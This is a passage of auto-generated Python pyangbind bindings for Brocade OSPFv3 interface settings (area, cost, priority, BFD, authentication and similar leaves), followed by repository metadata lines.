'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.)(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){2}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(([0-9])|([1-9]([0-9]{1,8}))|([1]([0-9]{1,9}))|([2][0]([0-9]{1,8}))|([2][1][0-3]([0-9]{1,7}))|([2][1][4][0-6]([0-9]{1,6}))|([2][1][4][7][0-3]([0-9]{1,5}))|([2][1][4][7][4][0-7]([0-9]{1,4}))|([2][1][4][7][4][8][0-2]([0-9]{1,3}))|([2][1][4][7][4][8][3][0-5]([0-9]{1,2}))|([2][1][4][7][4][8][3][6][0-3][0-9])|([2][1][4][7][4][8][3][6][4][0-7]))'}), is_leaf=True, yang_name="interface-area", rest_name="area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'OSPF area', u'alt-name': u'area'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='ospf:ospf-area-id', is_config=True)""",
})
self.__interface_area = t
if hasattr(self, '_set'):
self._set()
def _unset_interface_area(self):
self.__interface_area = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'((([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.)(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){2}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5]))|(([0-9])|([1-9]([0-9]{1,8}))|([1]([0-9]{1,9}))|([2][0]([0-9]{1,8}))|([2][1][0-3]([0-9]{1,7}))|([2][1][4][0-6]([0-9]{1,6}))|([2][1][4][7][0-3]([0-9]{1,5}))|([2][1][4][7][4][0-7]([0-9]{1,4}))|([2][1][4][7][4][8][0-2]([0-9]{1,3}))|([2][1][4][7][4][8][3][0-5]([0-9]{1,2}))|([2][1][4][7][4][8][3][6][0-3][0-9])|([2][1][4][7][4][8][3][6][4][0-7]))'}), is_leaf=True, yang_name="interface-area", rest_name="area", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'OSPF area', u'alt-name': u'area'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='ospf:ospf-area-id', is_config=True)
def _get_active(self):
"""
Getter method for active, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/active (empty)
YANG Description: When you configure an OSPFv3 interface to be active, that interface sends or receives all the control packets and forms the adjacency. By default, the ipv6 ospf active command is disabled. Whenever you configure the OSPFv3 interfaces to be passive using the default-passive-interface command, all the OSPFv3 interfaces stop sending and receiving control packets. To send and receive packets over specific interfaces, you can use the ipv6 ospf active command.
"""
return self.__active
def _set_active(self, v, load=False):
"""
Setter method for active, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/active (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_active is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_active() directly.
YANG Description: When you configure an OSPFv3 interface to be active, that interface sends or receives all the control packets and forms the adjacency. By default, the ipv6 ospf active command is disabled. Whenever you configure the OSPFv3 interfaces to be passive using the default-passive-interface command, all the OSPFv3 interfaces stop sending and receiving control packets. To send and receive packets over specific interfaces, you can use the ipv6 ospf active command.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="active", rest_name="active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Active information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """active must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="active", rest_name="active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Active information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)""",
})
self.__active = t
if hasattr(self, '_set'):
self._set()
def _unset_active(self):
self.__active = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="active", rest_name="active", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Active information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
def _get_passive(self):
"""
Getter method for passive, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/passive (empty)
YANG Description: When you configure an OSPF interface to be passive, that interface does not send or receive OSPF route updates. This option affects all IPv6 subnets configured on the interface. By default, all OSPF interfaces are active and thus can send and receive OSPF route information. Since a passive interface does not send or receive route information, the interface is in effect a stub network.
"""
return self.__passive
def _set_passive(self, v, load=False):
"""
Setter method for passive, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/passive (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_passive is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_passive() directly.
YANG Description: When you configure an OSPF interface to be passive, that interface does not send or receive OSPF route updates. This option affects all IPv6 subnets configured on the interface. By default, all OSPF interfaces are active and thus can send and receive OSPF route information. Since a passive interface does not send or receive route information, the interface is in effect a stub network.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="passive", rest_name="passive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Passive information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """passive must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="passive", rest_name="passive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Passive information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)""",
})
self.__passive = t
if hasattr(self, '_set'):
self._set()
def _unset_passive(self):
self.__passive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="passive", rest_name="passive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Passive information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
def _get_bfd(self):
"""
Getter method for bfd, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/bfd (container)
YANG Description: Set Bidirectional Forwarding Detection operation mode on this interface
"""
return self.__bfd
def _set_bfd(self, v, load=False):
"""
Setter method for bfd, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/bfd (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_bfd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bfd() directly.
YANG Description: Set Bidirectional Forwarding Detection operation mode on this interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set BFD operation mode on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bfd must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set BFD operation mode on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)""",
})
self.__bfd = t
if hasattr(self, '_set'):
self._set()
def _unset_bfd(self):
self.__bfd = YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set BFD operation mode on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
def _get_cost(self):
"""
Getter method for cost, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/cost (uint32)
YANG Description: The overhead required (cost) to send a packet across this interface
"""
return self.__cost
def _set_cost(self, v, load=False):
"""
Setter method for cost, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/cost (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_cost is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_cost() directly.
YANG Description: The overhead required (cost) to send a packet across this interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(1), is_leaf=True, yang_name="cost", rest_name="cost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface cost', u'cli-trim-default': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """cost must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(1), is_leaf=True, yang_name="cost", rest_name="cost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface cost', u'cli-trim-default': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)""",
})
self.__cost = t
if hasattr(self, '_set'):
self._set()
def _unset_cost(self):
self.__cost = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(1), is_leaf=True, yang_name="cost", rest_name="cost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface cost', u'cli-trim-default': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
def _get_instance(self):
"""
Getter method for instance, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/instance (uint32)
YANG Description: Instance indicates the number of OSPFv3 instances running on this interface. The default is 0.
"""
return self.__instance
def _set_instance(self, v, load=False):
"""
Setter method for instance, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/instance (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_instance is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_instance() directly.
YANG Description: Instance indicates the number of OSPFv3 instances running on this interface. The default is 0.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(0), is_leaf=True, yang_name="instance", rest_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Instance of OSPFv3 protocol on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """instance must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(0), is_leaf=True, yang_name="instance", rest_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Instance of OSPFv3 protocol on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)""",
})
self.__instance = t
if hasattr(self, '_set'):
self._set()
def _unset_instance(self):
self.__instance = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(0), is_leaf=True, yang_name="instance", rest_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Instance of OSPFv3 protocol on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
def _get_mtu_ignore(self):
"""
Getter method for mtu_ignore, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/mtu_ignore (empty)
YANG Description: To disable a check that verifies the same MTU is used on the interface shared by neighbors. By default, the mismatch detection is enabled.
"""
return self.__mtu_ignore
def _set_mtu_ignore(self, v, load=False):
"""
Setter method for mtu_ignore, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/mtu_ignore (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_mtu_ignore is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mtu_ignore() directly.
YANG Description: To disable a check that verifies the same MTU is used on the interface shared by neighbors. By default, the mismatch detection is enabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mtu-ignore", rest_name="mtu-ignore", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'To disable OSPFv3 MTU mismatch detection'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mtu_ignore must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mtu-ignore", rest_name="mtu-ignore", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'To disable OSPFv3 MTU mismatch detection'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)""",
})
self.__mtu_ignore = t
if hasattr(self, '_set'):
self._set()
def _unset_mtu_ignore(self):
self.__mtu_ignore = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mtu-ignore", rest_name="mtu-ignore", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'To disable OSPFv3 MTU mismatch detection'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
def _get_network(self):
"""
Getter method for network, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/network (enumeration)
YANG Description: To configure the OSPF network type. The default setting of the parameter depends on the network type.
"""
return self.__network
def _set_network(self, v, load=False):
"""
Setter method for network, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/network (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_network is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_network() directly.
YANG Description: To configure the OSPF network type. The default setting of the parameter depends on the network type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'broadcast': {'value': 1}, u'point-to-point': {'value': 2}},), is_leaf=True, yang_name="network", rest_name="network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface type'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='enumeration', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """network must be of a type compatible with enumeration""",
'defined-type': "brocade-ospfv3:enumeration",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'broadcast': {'value': 1}, u'point-to-point': {'value': 2}},), is_leaf=True, yang_name="network", rest_name="network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface type'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='enumeration', is_config=True)""",
})
self.__network = t
if hasattr(self, '_set'):
self._set()
def _unset_network(self):
self.__network = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'broadcast': {'value': 1}, u'point-to-point': {'value': 2}},), is_leaf=True, yang_name="network", rest_name="network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface type'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='enumeration', is_config=True)
def _get_priority(self):
"""
Getter method for priority, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/priority (uint32)
YANG Description: To modify the priority of an OSPF router. The value can be from 0-255. The priority is used when selecting the designated router (DR) and backup designated routers (BDRs). Default is 1. If the priority is set to 0, the router does not participate in DR and BDR election.
"""
return self.__priority
def _set_priority(self, v, load=False):
"""
Setter method for priority, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/priority (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_priority() directly.
YANG Description: To modify the priority of an OSPF router. The value can be from 0-255. The priority is used when selecting the designated router (DR) and backup designated routers (BDRs). Default is 1. If the priority is set to 0, the router does not participate in DR and BDR election.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface priority'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """priority must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface priority'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)""",
})
self.__priority = t
if hasattr(self, '_set'):
self._set()
def _unset_priority(self):
self.__priority = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface priority'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
def _get_suppress_linklsa(self):
"""
Getter method for suppress_linklsa, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/suppress_linklsa (empty)
YANG Description: Suppress link LSA advertisements
"""
return self.__suppress_linklsa
def _set_suppress_linklsa(self, v, load=False):
"""
Setter method for suppress_linklsa, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/suppress_linklsa (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_suppress_linklsa is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_suppress_linklsa() directly.
YANG Description: Suppress link LSA advertisements
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="suppress-linklsa", rest_name="suppress-linklsa", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Suppress link LSA advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """suppress_linklsa must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="suppress-linklsa", rest_name="suppress-linklsa", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Suppress link LSA advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)""",
})
self.__suppress_linklsa = t
if hasattr(self, '_set'):
self._set()
def _unset_suppress_linklsa(self):
self.__suppress_linklsa = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="suppress-linklsa", rest_name="suppress-linklsa", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Suppress link LSA advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
def _get_authentication(self):
"""
Getter method for authentication, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/authentication (container)
YANG Description: Configure ipsec authentication for the interface. The interface IPsec configuration takes precedence over the area IPsec configuration when an area and an interface within that area use IPsec. Therefore, if you configure IPsec for an interface and an area configuration also exists that includes this interface, the interface's IPsec configuration is used by that interface. However, if you disable IPsec on an interface, IPsec is disabled on the interface even if the interface has its own, specific authentication.
"""
return self.__authentication
def _set_authentication(self, v, load=False):
"""
Setter method for authentication, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/authentication (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_authentication is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_authentication() directly.
YANG Description: Configure ipsec authentication for the interface. The interface IPsec configuration takes precedence over the area IPsec configuration when an area and an interface within that area use IPsec. Therefore, if you configure IPsec for an interface and an area configuration also exists that includes this interface, the interface's IPsec configuration is used by that interface. However, if you disable IPsec on an interface, IPsec is disabled on the interface even if the interface has its own, specific authentication.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=authentication.authentication, is_container='container', presence=False, yang_name="authentication", rest_name="authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure authentication for the interface', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """authentication must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=authentication.authentication, is_container='container', presence=False, yang_name="authentication", rest_name="authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure authentication for the interface', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)""",
})
self.__authentication = t
if hasattr(self, '_set'):
self._set()
def _unset_authentication(self):
self.__authentication = YANGDynClass(base=authentication.authentication, is_container='container', presence=False, yang_name="authentication", rest_name="authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure authentication for the interface', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
def _get_link_interval_properties(self):
"""
Getter method for link_interval_properties, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/link_interval_properties (container)
"""
return self.__link_interval_properties
def _set_link_interval_properties(self, v, load=False):
"""
Setter method for link_interval_properties, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/link_interval_properties (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_link_interval_properties is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_link_interval_properties() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=link_interval_properties.link_interval_properties, is_container='container', presence=False, yang_name="link-interval-properties", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """link_interval_properties must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=link_interval_properties.link_interval_properties, is_container='container', presence=False, yang_name="link-interval-properties", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)""",
})
self.__link_interval_properties = t
if hasattr(self, '_set'):
self._set()
def _unset_link_interval_properties(self):
self.__link_interval_properties = YANGDynClass(base=link_interval_properties.link_interval_properties, is_container='container', presence=False, yang_name="link-interval-properties", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
interface_area = __builtin__.property(_get_interface_area, _set_interface_area)
active = __builtin__.property(_get_active, _set_active)
passive = __builtin__.property(_get_passive, _set_passive)
bfd = __builtin__.property(_get_bfd, _set_bfd)
cost = __builtin__.property(_get_cost, _set_cost)
instance = __builtin__.property(_get_instance, _set_instance)
mtu_ignore = __builtin__.property(_get_mtu_ignore, _set_mtu_ignore)
network = __builtin__.property(_get_network, _set_network)
priority = __builtin__.property(_get_priority, _set_priority)
suppress_linklsa = __builtin__.property(_get_suppress_linklsa, _set_suppress_linklsa)
authentication = __builtin__.property(_get_authentication, _set_authentication)
link_interval_properties = __builtin__.property(_get_link_interval_properties, _set_link_interval_properties)
_pyangbind_elements = {'interface_area': interface_area, 'active': active, 'passive': passive, 'bfd': bfd, 'cost': cost, 'instance': instance, 'mtu_ignore': mtu_ignore, 'network': network, 'priority': priority, 'suppress_linklsa': suppress_linklsa, 'authentication': authentication, 'link_interval_properties': link_interval_properties, }
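# --- Editor's note: hedged usage sketch, not part of the generated bindings ---
# Containers generated by pyangbind are driven through the properties declared
# above; each setter routes through YANGDynClass, which enforces the YANG
# restrictions. The constructor name below is an assumption for illustration;
# only the property names come from this file.
#
#   conf = interface_ospfv3_conf()     # hypothetical instantiation
#   conf.priority = 10                 # accepted: inside the 0..255 range
#   try:
#       conf.priority = 300            # rejected: outside 0..255
#   except ValueError as err:
#       print(err.args[0]['error-string'])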
|
[
"badaniya@brocade.com"
] |
badaniya@brocade.com
|
3915c6d17b22908a6dfe692f793c1eeb5ce13805
|
b4cf3c5caacd99d0fb0b864f4ee9f30056a52c05
|
/asynch/proto/columns/stringcolumn.py
|
a130c47f735e4a72d15f01aaf56f509c4e6b9b2c
|
[
"Apache-2.0"
] |
permissive
|
dbrojas/asynch
|
4376ca20e15897e0efe4345402d5d5af3a7c1212
|
94054ba4acb9f0d05ddedf5ae66278b5e5301fdd
|
refs/heads/master
| 2023-03-12T03:24:42.176643
| 2021-02-24T02:18:11
| 2021-02-24T02:18:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,469
|
py
|
